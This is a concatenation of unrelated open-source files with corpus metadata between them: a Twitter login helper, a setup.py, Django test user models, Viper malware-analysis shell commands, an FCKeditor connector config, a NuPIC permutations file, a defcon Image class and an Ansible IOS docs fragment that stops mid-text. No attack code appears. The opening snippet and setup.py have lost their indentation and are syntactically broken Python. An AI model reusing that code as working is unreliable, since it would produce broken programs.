if continueUrl.find('//') >= 0 or not continueUrl.startswith('/'):
continueUrl = default_success_url
return continueUrl
def twitter_user():
try:
token = twitter.get_access_request()
except:
    return False, None  # keep the (userinfo, token) pair shape used by the other returns
apitwitter = twitter.get_api(token)
try:
userinfo = apitwitter.GetUserInfo()
except:
logging.info("Error getting user info")
return False, None
return userinfo, token | apache-2.0 | -1,672,527,653,483,588,600 | 25.989583 | 103 | 0.676834 | false |
bmc/digest | setup.py | 1 | 2013 | #!/usr/bin/env python
#
# EasyInstall setup script for digest
#
# $Id$
# ---------------------------------------------------------------------------
import sys
import os
sys.path += [os.getcwd()]
from setuptools import setup, find_packages
import re
import imp
PKG = 'digest'
DESCRIPTION = 'Calculate message digests of files or standard input'
def load_info():
# Look for identifiers beginning with "__" at the beginning of the line.
result = {}
pattern = re.compile(r'^(__\w+__)\s*=\s*[\'"]([^\'"]*)[\'"]')
here = os.path.dirname(os.path.abspath(sys.argv[0]))
for line in open(os.path.join(here, PKG, '__init__.py'), 'r'):
match = pattern.match(line)
if match:
result[match.group(1)] = match.group(2)
sys.path = [here] + sys.path
mf = os.path.join(here, PKG, '__init__.py')
try:
m = imp.load_module(PKG, open(mf), mf,
('__init__.py', 'r', imp.PY_SOURCE))
result['long_description'] = m.__doc__
except:
result['long_description'] = DESCRIPTION
return result
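
# Illustrative example (added; values are made up): given a line like
#     __version__ = '1.0.3'
# in digest/__init__.py, load_info() returns a dict where
#     info['__version__'] == '1.0.3'
# plus 'long_description' taken from the module docstring.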
info = load_info()
# Now the setup stuff.
DOWNLOAD_URL = ('http://pypi.python.org/packages/source/d/%s/%s-%s.tar.gz' %
(PKG, PKG, info['__version__']))
setup (name = PKG,
version = info['__version__'],
description = DESCRIPTION,
long_description = info['long_description'],
packages = find_packages(),
url = info['__url__'],
license = info['__license__'],
author = info['__author__'],
author_email = info['__email__'],
entry_points = {'console_scripts' : 'digest=digest:main'},
classifiers = [
'Intended Audience :: Developers',
'Intended Audience :: System Administrators',
'License :: OSI Approved :: BSD License',
'Programming Language :: Python',
'Topic :: Text Processing :: Filters',
'Topic :: Utilities',
]
)
| bsd-3-clause | -1,755,184,100,655,136,500 | 29.969231 | 77 | 0.525584 | false |
wkschwartz/django | tests/auth_tests/models/custom_user.py | 73 | 3779 | from django.contrib.auth.models import (
AbstractBaseUser, AbstractUser, BaseUserManager, Group, Permission,
PermissionsMixin, UserManager,
)
from django.db import models
# The custom user uses email as the unique identifier, and requires
# that every user provide a date of birth. This lets us test
# changes in username datatype, and non-text required fields.
class CustomUserManager(BaseUserManager):
def create_user(self, email, date_of_birth, password=None, **fields):
"""
Creates and saves a User with the given email and password.
"""
if not email:
raise ValueError('Users must have an email address')
user = self.model(
email=self.normalize_email(email),
date_of_birth=date_of_birth,
**fields
)
user.set_password(password)
user.save(using=self._db)
return user
def create_superuser(self, email, password, date_of_birth, **fields):
u = self.create_user(email, password=password, date_of_birth=date_of_birth, **fields)
u.is_admin = True
u.save(using=self._db)
return u
class CustomUser(AbstractBaseUser):
email = models.EmailField(verbose_name='email address', max_length=255, unique=True)
is_active = models.BooleanField(default=True)
is_admin = models.BooleanField(default=False)
date_of_birth = models.DateField()
first_name = models.CharField(max_length=50)
custom_objects = CustomUserManager()
USERNAME_FIELD = 'email'
REQUIRED_FIELDS = ['date_of_birth', 'first_name']
def __str__(self):
return self.email
# Maybe required?
def get_group_permissions(self, obj=None):
return set()
def get_all_permissions(self, obj=None):
return set()
def has_perm(self, perm, obj=None):
return True
def has_perms(self, perm_list, obj=None):
return True
def has_module_perms(self, app_label):
return True
# Admin required fields
@property
def is_staff(self):
return self.is_admin
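
# Illustrative usage (added; not exercised by the test suite): creating an
# account through CustomUserManager supplies the email plus the extra required
# fields. The values below are placeholders.
#
#   from datetime import date
#   CustomUser.custom_objects.create_user(
#       'alice@example.com', date_of_birth=date(1990, 1, 1),
#       first_name='Alice', password='secret')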
class RemoveGroupsAndPermissions:
"""
A context manager to temporarily remove the groups and user_permissions M2M
fields from the AbstractUser class, so they don't clash with the
related_name sets.
"""
def __enter__(self):
self._old_au_local_m2m = AbstractUser._meta.local_many_to_many
self._old_pm_local_m2m = PermissionsMixin._meta.local_many_to_many
groups = models.ManyToManyField(Group, blank=True)
groups.contribute_to_class(PermissionsMixin, "groups")
user_permissions = models.ManyToManyField(Permission, blank=True)
user_permissions.contribute_to_class(PermissionsMixin, "user_permissions")
PermissionsMixin._meta.local_many_to_many = [groups, user_permissions]
AbstractUser._meta.local_many_to_many = [groups, user_permissions]
def __exit__(self, exc_type, exc_value, traceback):
AbstractUser._meta.local_many_to_many = self._old_au_local_m2m
PermissionsMixin._meta.local_many_to_many = self._old_pm_local_m2m
class CustomUserWithoutIsActiveField(AbstractBaseUser):
username = models.CharField(max_length=150, unique=True)
email = models.EmailField(unique=True)
objects = UserManager()
USERNAME_FIELD = 'username'
# The extension user is a simple extension of the built-in user class,
# adding a required date_of_birth field. This allows us to check for
# any hard references to the name "User" in forms/handlers etc.
with RemoveGroupsAndPermissions():
class ExtensionUser(AbstractUser):
date_of_birth = models.DateField()
custom_objects = UserManager()
REQUIRED_FIELDS = AbstractUser.REQUIRED_FIELDS + ['date_of_birth']
| bsd-3-clause | 17,085,836,832,844,920 | 32.741071 | 93 | 0.677693 | false |
cherry-wb/viper | viper/core/ui/commands.py | 1 | 10438 | import os
import getopt
import tempfile
from viper.common.out import *
from viper.common.objects import File
from viper.common.colors import bold, cyan, white
from viper.common.network import download
from viper.core.session import __session__
from viper.core.plugins import __modules__
from viper.core.database import Database
from viper.core.storage import store_sample, get_sample_path
class Commands(object):
def __init__(self):
# Open connection to the database.
self.db = Database()
# Map commands to their related functions.
self.commands = dict(
help=dict(obj=self.cmd_help, description="Show this help message"),
open=dict(obj=self.cmd_open, description="Open a file"),
close=dict(obj=self.cmd_close, description="Close the current session"),
info=dict(obj=self.cmd_info, description="Show information on the opened file"),
clear=dict(obj=self.cmd_clear, description="Clear the console"),
store=dict(obj=self.cmd_store, description="Store the opened file to the local repository"),
delete=dict(obj=self.cmd_delete, description="Delete the opened file"),
find=dict(obj=self.cmd_find, description="Find a file"),
)
##
# CLEAR
#
# This command simply clears the shell.
def cmd_clear(self, *args):
os.system('clear')
##
# HELP
#
# This command simply prints the help message.
# It lists both embedded commands and loaded modules.
def cmd_help(self, *args):
print(bold("Commands:"))
rows = []
for command_name, command_item in self.commands.items():
rows.append([command_name, command_item['description']])
print(table(['Command', 'Description'], rows))
print("")
print(bold("Modules:"))
rows = []
for module_name, module_item in __modules__.items():
rows.append([module_name, module_item['description']])
print(table(['Command', 'Description'], rows))
##
# OPEN
#
# This command is used to open a session on a given file.
    # It can either be an external file path, or a SHA256 hash of a file which
# has been previously imported and stored.
# While the session is active, every operation and module executed will be
# run against the file specified.
def cmd_open(self, *args):
def usage():
print("usage: open [-h] [-f] [-u] [-t] <target>")
def help():
usage()
print("")
print("Options:")
print("\t--help (-h)\tShow this help message")
print("\t--file (-f)\tThe target is a file")
print("\t--url (-u)\tThe target is a URL")
print("\t--tor (-t)\tDownload the file through Tor")
print("")
print("You can also specify a SHA256 hash to a previously stored")
print("file in order to open a session on it.")
print("")
try:
opts, argv = getopt.getopt(args, 'hfut', ['help', 'file', 'url', 'tor'])
except getopt.GetoptError as e:
print(e)
usage()
return
is_file = False
is_url = False
use_tor = False
for opt, value in opts:
if opt in ('-h', '--help'):
help()
return
elif opt in ('-f', '--file'):
is_file = True
elif opt in ('-u', '--url'):
is_url = True
elif opt in ('-t', '--tor'):
use_tor = True
if len(argv) == 0:
usage()
return
else:
target = argv[0]
# If it's a file path, open a session on it.
if is_file:
target = os.path.expanduser(target)
if not os.path.exists(target) or not os.path.isfile(target):
print_error("File not found")
return
__session__.set(target)
# If it's a URL, download it and open a session on the temporary
# file.
elif is_url:
data = download(url=target, tor=use_tor)
if data:
tmp = tempfile.NamedTemporaryFile(delete=False)
tmp.write(data)
tmp.close()
__session__.set(tmp.name)
# Otherwise we assume it's an hash of an previously stored sample.
else:
target = argv[0].strip().lower()
path = get_sample_path(target)
if path:
__session__.set(path)
##
# CLOSE
#
# This command resets the open session.
# After that, all handles to the opened file should be closed and the
# shell should be restored to the default prompt.
def cmd_close(self, *args):
__session__.clear()
##
# INFO
#
# This command returns information on the open session. It returns details
    # on the file (e.g. hashes) and other information that might be available from
# the database.
def cmd_info(self, *args):
if __session__.is_set():
print(table(
['Key', 'Value'],
[
('Name', __session__.file.name),
('Tags', __session__.file.tags),
('Path', __session__.file.path),
('Size', __session__.file.size),
('Type', __session__.file.type),
('MD5', __session__.file.md5),
('SHA1', __session__.file.sha1),
('SHA256', __session__.file.sha256),
('SHA512', __session__.file.sha512),
('SSdeep', __session__.file.ssdeep),
('CRC32', __session__.file.crc32)
]
))
##
# STORE
#
# This command stores the opened file in the local repository and tries
# to store details in the database.
def cmd_store(self, *args):
def usage():
print("usage: store [-h] [-d] [-f <path>] [-t]")
def help():
usage()
print("")
print("Options:")
print("\t--help (-h)\tShow this help message")
print("\t--delete (-d)\tDelete the original file")
print("\t--folder (-f)\tSpecify a folder to import")
print("\t--tags (-t)\tSpecify a list of comma-separated tags")
print("")
try:
opts, argv = getopt.getopt(args, 'hdf:t:', ['help', 'delete', 'folder=', 'tags='])
except getopt.GetoptError as e:
print(e)
usage()
return
do_delete = False
folder = False
tags = None
for opt, value in opts:
if opt in ('-h', '--help'):
help()
return
elif opt in ('-d', '--delete'):
do_delete = True
elif opt in ('-f', '--folder'):
folder = value
elif opt in ('-t', '--tags'):
tags = value
def add_file(obj, tags=None):
# Store file to the local repository.
new_path = store_sample(obj)
if new_path:
# Add file to the database.
status = self.db.add(obj=obj, tags=tags)
print_success("Stored to: {0}".format(new_path))
# Delete the file if requested to do so.
if do_delete:
try:
os.unlink(obj.path)
except Exception as e:
print_warning("Failed deleting file: {0}".format(e))
# If the user specified the --folder flag, we walk recursively and try
# to add all contained files to the local repository.
        # This is not going to open a new session.
# TODO: perhaps disable or make recursion optional?
if folder:
# Check if the specified folder is valid.
if os.path.isdir(folder):
# Walk through the folder and subfolders.
for dir_name, dir_names, file_names in os.walk(folder):
# Add each collected file.
for file_name in file_names:
file_path = os.path.join(dir_name, file_name)
file_obj = File(file_path)
# Add file.
add_file(file_obj, tags)
else:
print_error("You specified an invalid folder: {0}".format(folder))
# Otherwise we try to store the currently opened file, if there is any.
else:
if __session__.is_set():
# Add file.
add_file(__session__.file, tags)
# Open session to the new file.
self.cmd_open(*[__session__.file.sha256])
else:
print_error("No session opened")
##
# DELETE
#
    # This command deletes the currently opened file (only if it's stored in
    # the local repository) and removes the details from the database.
def cmd_delete(self, *args):
if __session__.is_set():
while True:
choice = raw_input("Are you sure you want to delete this binary? Can't be reverted! [y/n] ")
if choice == 'y':
break
elif choice == 'n':
return
rows = self.db.find('sha256', __session__.file.sha256)
if rows:
malware_id = rows[0].id
if self.db.delete(malware_id):
print_success("File deleted")
else:
print_error("Unable to delete file")
os.remove(get_sample_path(__session__.file.sha256))
__session__.clear()
##
# FIND
#
# This command is used to search for files in the database.
def cmd_find(self, *args):
if len(args) == 0:
print_error("Invalid search term")
return
key = args[0]
try:
value = args[1]
except IndexError:
value = None
items = self.db.find(key, value)
if not items:
return
rows = []
for item in items:
rows.append([item.name, item.type, item.sha256])
print(table(['Name', 'Type', 'SHA256'], rows))
| bsd-3-clause | -4,457,562,119,359,480,300 | 32.88961 | 108 | 0.511017 | false |
quanganh/fckeditor | public/javascripts/fckeditor/editor/filemanager/connectors/py/config.py | 93 | 7095 | #!/usr/bin/env python
"""
* FCKeditor - The text editor for Internet - http://www.fckeditor.net
* Copyright (C) 2003-2008 Frederico Caldeira Knabben
*
* == BEGIN LICENSE ==
*
* Licensed under the terms of any of the following licenses at your
* choice:
*
* - GNU General Public License Version 2 or later (the "GPL")
* http://www.gnu.org/licenses/gpl.html
*
* - GNU Lesser General Public License Version 2.1 or later (the "LGPL")
* http://www.gnu.org/licenses/lgpl.html
*
* - Mozilla Public License Version 1.1 or later (the "MPL")
* http://www.mozilla.org/MPL/MPL-1.1.html
*
* == END LICENSE ==
*
* Configuration file for the File Manager Connector for Python
"""
# INSTALLATION NOTE: You must set up your server environment accordingly to run
# python scripts. This connector requires Python 2.4 or greater.
#
# Supported operation modes:
# * WSGI (recommended): You'll need apache + mod_python + modpython_gateway
# or any web server capable of the WSGI python standard
# * Plain Old CGI: Any server capable of running standard python scripts
# (although mod_python is recommended for performance)
# This was the previous connector version operation mode
#
# If you're using the Apache web server, rename the htaccess.txt to .htaccess,
# and set the proper options and paths.
# For WSGI and mod_python, you may need to download modpython_gateway from:
# http://projects.amor.org/misc/svn/modpython_gateway.py and copy it in this
# directory.
# SECURITY: You must explicitly enable this "connector". (Set it to "True").
# WARNING: don't just set "ConfigIsEnabled = True", you must be sure that only
# authenticated users can access this file or use some kind of session checking.
Enabled = False
# Path to user files relative to the document root.
UserFilesPath = '/userfiles/'
# Fill the following value if you prefer to specify the absolute path for the
# user files directory. Useful if you are using a virtual directory, symbolic
# link or alias. Examples: 'C:\\MySite\\userfiles\\' or '/root/mysite/userfiles/'.
# Attention: The above 'UserFilesPath' must point to the same directory.
# WARNING: GetRootPath may not work in virtual or mod_python configurations, and
# may not be thread safe. Use this configuration parameter instead.
UserFilesAbsolutePath = ''
# Due to security issues with Apache modules, it is recommended to leave the
# following setting enabled.
ForceSingleExtension = True
# What the user can do with this connector
ConfigAllowedCommands = [ 'QuickUpload', 'FileUpload', 'GetFolders', 'GetFoldersAndFiles', 'CreateFolder' ]
# Allowed Resource Types
ConfigAllowedTypes = ['File', 'Image', 'Flash', 'Media']
# After file is uploaded, sometimes it is required to change its permissions
# so that it was possible to access it at the later time.
# If possible, it is recommended to set more restrictive permissions, like 0755.
# Set to 0 to disable this feature.
# Note: not needed on Windows-based servers.
ChmodOnUpload = 0755
# See comments above.
# Used when creating folders that does not exist.
ChmodOnFolderCreate = 0755
# Do not touch this 3 lines, see "Configuration settings for each Resource Type"
AllowedExtensions = {}; DeniedExtensions = {};
FileTypesPath = {}; FileTypesAbsolutePath = {};
QuickUploadPath = {}; QuickUploadAbsolutePath = {};
# Configuration settings for each Resource Type
#
# - AllowedExtensions: the possible extensions that can be allowed.
# If it is empty then any file type can be uploaded.
# - DeniedExtensions: The extensions that won't be allowed.
# If it is empty then no restrictions are done here.
#
# For a file to be uploaded it has to fulfill both the AllowedExtensions
# and DeniedExtensions (that's it: not being denied) conditions.
#
# - FileTypesPath: the virtual folder relative to the document root where
# these resources will be located.
# Attention: It must start and end with a slash: '/'
#
# - FileTypesAbsolutePath: the physical path to the above folder. It must be
# an absolute path.
# If it's an empty string then it will be autocalculated.
# Useful if you are using a virtual directory, symbolic link or alias.
# Examples: 'C:\\MySite\\userfiles\\' or '/root/mysite/userfiles/'.
# Attention: The above 'FileTypesPath' must point to the same directory.
# Attention: It must end with a slash: '/'
#
#
# - QuickUploadPath: the virtual folder relative to the document root where
# these resources will be uploaded using the Upload tab in the resources
# dialogs.
# Attention: It must start and end with a slash: '/'
#
# - QuickUploadAbsolutePath: the physical path to the above folder. It must be
# an absolute path.
# If it's an empty string then it will be autocalculated.
# Useful if you are using a virtual directory, symbolic link or alias.
# Examples: 'C:\\MySite\\userfiles\\' or '/root/mysite/userfiles/'.
# Attention: The above 'QuickUploadPath' must point to the same directory.
# Attention: It must end with a slash: '/'
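#
# As a purely illustrative example (not a stock resource type), a hypothetical
# "Archive" type would be declared with the same six settings described above:
#
#   AllowedExtensions['Archive'] = ['7z','gz','rar','tar','zip']
#   DeniedExtensions['Archive'] = []
#   FileTypesPath['Archive'] = UserFilesPath + 'archive/'
#   FileTypesAbsolutePath['Archive'] = (not UserFilesAbsolutePath == '') and (UserFilesAbsolutePath + 'archive/') or ''
#   QuickUploadPath['Archive'] = FileTypesPath['Archive']
#   QuickUploadAbsolutePath['Archive'] = FileTypesAbsolutePath['Archive']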
AllowedExtensions['File'] = ['7z','aiff','asf','avi','bmp','csv','doc','fla','flv','gif','gz','gzip','jpeg','jpg','mid','mov','mp3','mp4','mpc','mpeg','mpg','ods','odt','pdf','png','ppt','pxd','qt','ram','rar','rm','rmi','rmvb','rtf','sdc','sitd','swf','sxc','sxw','tar','tgz','tif','tiff','txt','vsd','wav','wma','wmv','xls','xml','zip']
DeniedExtensions['File'] = []
FileTypesPath['File'] = UserFilesPath + 'file/'
FileTypesAbsolutePath['File'] = (not UserFilesAbsolutePath == '') and (UserFilesAbsolutePath + 'file/') or ''
QuickUploadPath['File'] = FileTypesPath['File']
QuickUploadAbsolutePath['File'] = FileTypesAbsolutePath['File']
AllowedExtensions['Image'] = ['bmp','gif','jpeg','jpg','png']
DeniedExtensions['Image'] = []
FileTypesPath['Image'] = UserFilesPath + 'image/'
FileTypesAbsolutePath['Image'] = (not UserFilesAbsolutePath == '') and UserFilesAbsolutePath + 'image/' or ''
QuickUploadPath['Image'] = FileTypesPath['Image']
QuickUploadAbsolutePath['Image']= FileTypesAbsolutePath['Image']
AllowedExtensions['Flash'] = ['swf','flv']
DeniedExtensions['Flash'] = []
FileTypesPath['Flash'] = UserFilesPath + 'flash/'
FileTypesAbsolutePath['Flash'] = ( not UserFilesAbsolutePath == '') and UserFilesAbsolutePath + 'flash/' or ''
QuickUploadPath['Flash'] = FileTypesPath['Flash']
QuickUploadAbsolutePath['Flash']= FileTypesAbsolutePath['Flash']
AllowedExtensions['Media'] = ['aiff','asf','avi','bmp','fla', 'flv','gif','jpeg','jpg','mid','mov','mp3','mp4','mpc','mpeg','mpg','png','qt','ram','rm','rmi','rmvb','swf','tif','tiff','wav','wma','wmv']
DeniedExtensions['Media'] = []
FileTypesPath['Media'] = UserFilesPath + 'media/'
FileTypesAbsolutePath['Media'] = ( not UserFilesAbsolutePath == '') and UserFilesAbsolutePath + 'media/' or ''
QuickUploadPath['Media'] = FileTypesPath['Media']
QuickUploadAbsolutePath['Media']= FileTypesAbsolutePath['Media']
| mit | -392,230,004,533,565,630 | 46.59589 | 340 | 0.69852 | false |
rcrowder/nupic | tests/swarming/nupic/swarming/experiments/dummyV2/permutations.py | 10 | 3634 | # ----------------------------------------------------------------------
# Numenta Platform for Intelligent Computing (NuPIC)
# Copyright (C) 2013, Numenta, Inc. Unless you have an agreement
# with Numenta, Inc., for a separate license for this software code, the
# following terms and conditions apply:
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU Affero Public License for more details.
#
# You should have received a copy of the GNU Affero Public License
# along with this program. If not, see http://www.gnu.org/licenses.
#
# http://numenta.org/licenses/
# ----------------------------------------------------------------------
"""
Template file used by ExpGenerator to generate the actual
permutations.py file by replacing $XXXXXXXX tokens with desired values.
This permutations.py file was generated by:
'/Users/ronmarianetti/nupic/eng/lib/python2.6/site-packages/nupic/frameworks/opf/expGenerator/experiment_generator.py'
"""
import os
from nupic.swarming.permutation_helpers import *
# The name of the field being predicted. Any allowed permutation MUST contain
# the prediction field.
# (generated from PREDICTION_FIELD)
predictedField = 'consumption'
permutations = {
'modelParams': {
'sensorParams': {
'encoders': {
'gym': PermuteEncoder(fieldName='gym', encoderClass='SDRCategoryEncoder', w=21, n=300),
'timestamp_dayOfWeek': PermuteEncoder(fieldName='timestamp', encoderClass='DateEncoder.dayOfWeek', radius=PermuteChoices([1, 3]), w=7),
'timestamp_timeOfDay': PermuteEncoder(fieldName='timestamp', encoderClass='DateEncoder.timeOfDay', radius=PermuteChoices([1, 8]), w=7),
'consumption': PermuteEncoder(fieldName='consumption', encoderClass='ScalarEncoder', maxval=PermuteInt(100, 300, 25), n=PermuteInt(39, 1500, 60), w=21, minval=0),
'address': PermuteEncoder(fieldName='address', encoderClass='SDRCategoryEncoder', w=21, n=300),
},
},
'tmParams': {
'minThreshold': PermuteInt(9, 12),
'activationThreshold': PermuteInt(12, 16),
},
}
}
# Fields selected for final hypersearch report;
# NOTE: These values are used as regular expressions by RunPermutations.py's
# report generator
# (fieldname values generated from PERM_PREDICTED_FIELD_NAME)
report = [
'.*consumption.*',
]
# Permutation optimization setting: either minimize or maximize metric
# used by RunPermutations.
# NOTE: The value is used as a regular expressions by RunPermutations.py's
# report generator
# (generated from minimize = 'prediction:rmse:field=consumption')
minimize = 'prediction:rmse:field=consumption'
def permutationFilter(perm):
""" This function can be used to selectively filter out specific permutation
combinations. It is called by RunPermutations for every possible permutation
  of the variables in the permutations dict. It should return True for a valid
combination of permutation values and False for an invalid one.
Parameters:
---------------------------------------------------------
perm: dict of one possible combination of name:value
pairs chosen from permutations.
"""
# An example of how to use this
if perm['modelParams']['sensorParams']['encoders']['consumption']['maxval'] > 250:
return False;
return True
| agpl-3.0 | 64,258,846,940,821,384 | 36.854167 | 170 | 0.694276 | false |
moyogo/defcon | Lib/defcon/objects/image.py | 1 | 9304 | from __future__ import absolute_import
import weakref
from defcon.objects.base import BaseDictObject
from defcon.objects.color import Color
_defaultTransformation = {
"xScale" : 1,
"xyScale" : 0,
"yxScale" : 0,
"yScale" : 1,
"xOffset" : 0,
"yOffset" : 0
}
class Image(BaseDictObject):
"""
This object represents an image reference in a glyph.
**This object posts the following notifications:**
- Image.Changed
- Image.FileNameChanged
- Image.TransformationChanged
- Image.ColorChanged
- Image.ImageDataChanged
During initialization an image dictionary, following the format defined
in the UFO spec, can be passed. If so, the new object will be populated
with the data from the dictionary.
"""
changeNotificationName = "Image.Changed"
representationFactories = {}
def __init__(self, glyph=None, imageDict=None):
self._font = None
self._layerSet = None
self._layer = None
self._glyph = None
self.glyph = glyph
super(Image, self).__init__()
self.beginSelfNotificationObservation()
self["fileName"] = None
self["color"] = None
if imageDict is not None:
self.update(imageDict)
for key, value in _defaultTransformation.items():
if self.get(key) is None:
self[key] = value
self._dirty = False
def __len__(self):
# this is a little hack for glifLib writing.
        # when a GLIF is written, glyph.image is checked with:
# if glyph.image:
# fileName is required, so if that isn't defined
# return 0. this tells glifLib to skip the image.
if self["fileName"] is None:
return 0
return super(Image, self).__len__()
# --------------
# Parent Objects
# --------------
def getParent(self):
return self.glyph
def _get_font(self):
font = None
if self._font is None:
glyph = self.glyph
if glyph is not None:
font = glyph.font
if font is not None:
self._font = weakref.ref(font)
else:
font = self._font()
return font
font = property(_get_font, doc="The :class:`Font` that this image belongs to.")
def _get_layerSet(self):
layerSet = None
if self._layerSet is None:
glyph = self.glyph
if glyph is not None:
layerSet = glyph.layerSet
if layerSet is not None:
self._layerSet = weakref.ref(layerSet)
else:
layerSet = self._layerSet()
return layerSet
layerSet = property(_get_layerSet, doc="The :class:`LayerSet` that this image belongs to.")
def _get_layer(self):
layer = None
if self._layer is None:
glyph = self.glyph
if glyph is not None:
layer = glyph.layer
if layer is not None:
self._layer = weakref.ref(layer)
else:
layer = self._layer()
return layer
layer = property(_get_layer, doc="The :class:`Layer` that this image belongs to.")
def _get_glyph(self):
if self._glyph is None:
return None
return self._glyph()
def _set_glyph(self, glyph):
assert self._glyph is None
if glyph is not None:
glyph = weakref.ref(glyph)
self._font = None
self._layerSet = None
self._layer = None
self._glyph = glyph
glyph = property(_get_glyph, _set_glyph, doc="The :class:`Glyph` that this image belongs to. This should not be set externally.")
# ----------
# Attributes
# ----------
# file name
def _get_fileName(self):
return self["fileName"]
def _set_fileName(self, fileName):
oldFileName = self.get("fileName")
if fileName == oldFileName:
return
self["fileName"] = fileName
self.postNotification("Image.FileNameChanged", data=dict(oldValue=oldFileName, newValue=fileName))
fileName = property(_get_fileName, _set_fileName, doc="The file name the image. Setting this will posts *Image.Changed* and *Image.FileNameChanged* notifications.")
# transformation
def _get_transformation(self):
if "xScale" not in self:
return
return (self["xScale"], self["xyScale"], self["yxScale"], self["yScale"], self["xOffset"], self["yOffset"])
def _set_transformation(self, transformation):
oldTransformation = self.transformation
if oldTransformation == transformation:
return
xScale, xyScale, yxScale, yScale, xOffset, yOffset = transformation
# hold the notifications so that only one is sent out
self.holdNotifications(note="Requested by Image._set_transformation.")
self["xScale"] = xScale
self["xyScale"] = xyScale
self["yxScale"] = yxScale
self["yScale"] = yScale
self["xOffset"] = xOffset
self["yOffset"] = yOffset
self.releaseHeldNotifications()
self.postNotification("Image.TransformationChanged", data=dict(oldValue=oldTransformation, newValue=transformation))
transformation = property(_get_transformation, _set_transformation, doc="The transformation matrix for the image. Setting this will posts *Image.Changed* and *Image.TransformationChanged* notifications.")
# color
def _get_color(self):
return self.get("color")
def _set_color(self, color):
if color is None:
newColor = None
else:
newColor = Color(color)
oldColor = self.get("color")
if newColor == oldColor:
return
self["color"] = newColor
self.postNotification("Image.ColorChanged", data=dict(oldValue=oldColor, newValue=newColor))
color = property(_get_color, _set_color, doc="The image's :class:`Color` object. When setting, the value can be a UFO color string, a sequence of (r, g, b, a) or a :class:`Color` object. Setting this posts *Image.ColorChanged* and *Image.Changed* notifications.")
# ----
# Move
# ----
def move(self, values):
"""
Move the image by **(x, y)**.
This posts *Image.Changed* and *Image.TransformationChanged* notifications.
"""
xOffset, yOffset = values
if not (xOffset or yOffset):
return
oldTransformation = self.transformation
self.holdNotifications(note="Requested by Image.move.")
self["xOffset"] += xOffset
self["yOffset"] += yOffset
self.releaseHeldNotifications()
self.postNotification("Image.TransformationChanged", data=dict(oldValue=oldTransformation, newValue=self.transformation))
# ------------------------
# Notification Observation
# ------------------------
def beginSelfNotificationObservation(self):
super(Image, self).beginSelfNotificationObservation()
self.beginSelfImageSetNotificationObservation()
def endSelfNotificationObservation(self):
self.endImageSetNotificationObservation()
super(Image, self).endSelfNotificationObservation()
self._font = None
self._layerSet = None
self._layer = None
self._glyph = None
def beginSelfImageSetNotificationObservation(self):
font = self.font
if font is None:
return
imageSet = font.images
imageSet.addObserver(self, "imageSetImageAddedNotificationCallback", "ImageSet.ImageAdded")
imageSet.addObserver(self, "imageSetImageDeletedNotificationCallback", "ImageSet.ImageDeleted")
imageSet.addObserver(self, "imageSetImageChangedNotificationCallback", "ImageSet.ImageChanged")
layer = self.layer
layer.addObserver(self, "layerColorChangedNotificationCallback", "Layer.ColorChanged")
def endImageSetNotificationObservation(self):
font = self.font
if font is None:
return
imageSet = font.images
imageSet.removeObserver(self, "ImageSet.ImageAdded")
imageSet.removeObserver(self, "ImageSet.ImageDeleted")
imageSet.removeObserver(self, "ImageSet.ImageChanged")
layer = self.layer
layer.removeObserver(self, "Layer.ColorChanged")
def imageSetImageAddedNotificationCallback(self, notification):
name = notification.data["name"]
if name != self.fileName:
return
self.postNotification("Image.ImageDataChanged")
def imageSetImageDeletedNotificationCallback(self, notification):
name = notification.data["name"]
if name != self.fileName:
return
self.postNotification("Image.ImageDataChanged")
def imageSetImageChangedNotificationCallback(self, notification):
name = notification.data["name"]
if name != self.fileName:
return
self.postNotification("Image.ImageDataChanged")
def layerColorChangedNotificationCallback(self, notification):
if self.color is not None:
self.postNotification("Image.ColorChanged", data=notification.data)
if __name__ == "__main__":
import doctest
doctest.testmod()
| mit | -8,821,778,087,892,059 | 33.080586 | 267 | 0.617906 | false |
britcey/ansible | lib/ansible/utils/module_docs_fragments/ios.py | 101 | 4360 | #
# (c) 2015, Peter Sprygada <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
class ModuleDocFragment(object):
# Standard files documentation fragment
DOCUMENTATION = """
options:
authorize:
description:
- Instructs the module to enter privileged mode on the remote device
before sending any commands. If not specified, the device will
attempt to execute all commands in non-privileged mode. If the value
is not specified in the task, the value of environment variable
C(ANSIBLE_NET_AUTHORIZE) will be used instead.
default: no
choices: ['yes', 'no']
auth_pass:
description:
- Specifies the password to use if required to enter privileged mode
on the remote device. If I(authorize) is false, then this argument
does nothing. If the value is not specified in the task, the value of
environment variable C(ANSIBLE_NET_AUTH_PASS) will be used instead.
default: none
provider:
description:
- A dict object containing connection details.
default: null
suboptions:
host:
description:
- Specifies the DNS host name or address for connecting to the remote
device over the specified transport. The value of host is used as
the destination address for the transport.
required: true
port:
description:
- Specifies the port to use when building the connection to the remote device.
default: 22
username:
description:
- Configures the username to use to authenticate the connection to
the remote device. This value is used to authenticate
the SSH session. If the value is not specified in the task, the
value of environment variable C(ANSIBLE_NET_USERNAME) will be used instead.
password:
description:
- Specifies the password to use to authenticate the connection to
the remote device. This value is used to authenticate
the SSH session. If the value is not specified in the task, the
value of environment variable C(ANSIBLE_NET_PASSWORD) will be used instead.
default: null
timeout:
description:
- Specifies the timeout in seconds for communicating with the network device
for either connecting or sending commands. If the timeout is
exceeded before the operation is completed, the module will error.
default: 10
ssh_keyfile:
description:
- Specifies the SSH key to use to authenticate the connection to
the remote device. This value is the path to the
key used to authenticate the SSH session. If the value is not specified
in the task, the value of environment variable C(ANSIBLE_NET_SSH_KEYFILE)
will be used instead.
authorize:
description:
- Instructs the module to enter privileged mode on the remote device
before sending any commands. If not specified, the device will
attempt to execute all commands in non-privileged mode. If the value
is not specified in the task, the value of environment variable
C(ANSIBLE_NET_AUTHORIZE) will be used instead.
default: no
choices: ['yes', 'no']
auth_pass:
description:
- Specifies the password to use if required to enter privileged mode
on the remote device. If I(authorize) is false, then this argument
does nothing. If the value is not specified in the task, the value of
